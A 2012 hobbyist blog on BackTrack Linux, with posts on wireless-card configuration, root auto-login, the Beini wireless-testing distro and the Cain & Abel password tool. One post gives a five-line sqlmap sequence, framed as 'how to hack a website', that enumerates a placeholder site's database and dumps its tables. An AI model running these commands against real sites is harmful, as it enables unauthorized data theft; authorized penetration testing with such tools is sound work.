Tuesday, March 20, 2012

Website moving...

Planning on moving the site back to a support forum by request of some users...

Paid for a 5 year hosting plan so i got 5 years of hosting paid for going to work on restoring the forum back to the way it was and possibly wipping accounts and getting raid of the old topics to start from scratch.

Tuesday, March 6, 2012

How to disable Internal Wireless card on Backtrack

How to disable Internal Wireless card on Backtrack

Open a Terminal and type innano /etc/network/interfaces
Comment out the the one that is your Internal Wireless cards Interface using the # sign place it infront of the Wireless Interface.
Might be wlan0 recommend you do a iwconfig in the Terminal so you can get all the interfaces installed eth0 is basically the Ethernet its not a wireless interface if you see eth0.

Your looking for a wlan0 ect...

Make sure you remove or unplug your external wireless card so you don't disable to wrong one.

When you find and comment out the internal wireless cards Press CTRL + X and then type y and then press enter should take you back to root@bt:~#

Then just type /etc/init.d/networking restart
And  this will restart the networking you shouldn't have the Internal wiresless card listed anymore if you commented the right one out.

Saturday, February 25, 2012

Beini 1.2.1 With Feeding Bottle


With the wireless networks (IEEE 802.11) devices proliferate, wireless network security issues become the focus of attention. Beini is used for wireless network security assessment of a system. 

Beini:A wireless network security testing system,it is based on Tiny Core Linux. 
FeedingBottle:Aircrack-ng's GUI on Beini. 

http://adf.ly/5lmjW - For Download.

Friday, February 24, 2012

Auto login and startx in Backtrack 5

Let's face it, we all use tty1 to login as root/toor and launch startx... so why not boot automatically into our favorite desktop environment? In the following lines I'll explain how to achieve this in three simple steps.

Step 1: Install mingetty.
We need a small application that allows us to auto login as the user that we want. There are severals apps in the repositories to do this task. In fact, you can write your own app to do this in C like many tutorials suggest on the Internet. I'll use mingetty.

apt-get install mingetty

Step 2: Configuration of tty1
Now we need to change the behaviour of tty1 to use mingetty instead of the standard getty. To achieve this we need to edit the file /etc/init/tty1.conf, so use your favourite editor. I'll use nano.

nano /etc/init/tty1.conf

Let's comment out the getty line so it looks like this:

#exec /sbin/getty -8 38400 tty1

Just below this commented line, add the following one:

exec /sbin/mingetty --autologin root --noclear tty1

Save and close the file.

Step 3: startx right after login
The last thing we need to do is launch the startx command just after the login. To do this we need to edit the file /root/.bash_profile. Everything we write in this file is going to be executed just after the root logs in. By default there is no such file in BT5 installation but maybe you added some useful command for you and you want to keep it, so we are going to run the following command:

echo "startx" >> ~/.bash_profile

Done. Restart to see it working.


Thursday, February 23, 2012

How to SQL Inject with SQLMAP on Backtrack5 RC1

Since alot of people don't know how to SQL Inject a website using sqlmap i have made this video and explain how to hack a website using sqlmap.

cd /pentest/database/sqlmap
python sqlmap.py -u http://site.com/page.php?id=2 --dbs
python sqlmap.py -u http://site.com/page.php?id=2 -D databasenamehere --tables
python sqlmap.py -u http://site.com/page.php?id=2 -T tablesnamehere --columns
python sqlmap.py -u http://site.com/page.php?id=2 -T tablesnamehere -U test --dump

A Cain and Abel Tutorial for hacking

A quick guide to using Cain and Abel's sniffing and password cracking features.
Check the look in with the Labels for download to Cain & Abel

Cain & Abel is a password recovery tool for Microsoft Operating Systems.

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort. It covers some security aspects/weakness present in protocol's standards, authentication methods and caching mechanisms; its main purpose is the simplified recovery of passwords and credentials from various sources, however it also ships some "non standard" utilities for Microsoft Windows users.

Cain & Abel has been developed in the hope that it will be useful for network administrators, teachers, security consultants/professionals, forensic staff, security software vendors, professional penetration tester and everyone else that plans to use it for ethical reasons. The author will not help or support any illegal activity done with this program. Be warned that there is the possibility that you will cause damages and/or loss of data using this software and that in no events shall the author be liable for such damages or loss of data. Please carefully read the License Agreement included in the program before using it.

The latest version is faster and contains a lot of new features like APR (Arp Poison Routing) which enables sniffing on switched LANs and Man-in-the-Middle attacks. The sniffer in this version can also analyze encrypted protocols such as SSH-1 and HTTPS, and contains filters to capture credentials from a wide range of authentication mechanisms. The new version also ships routing protocols authentication monitors and routes extractors, dictionary and brute-force crackers for all common hashing algorithms and for several specific authentications, password/hash calculators, cryptanalysis attacks, password decoders and  some not so common utilities related to network and system security.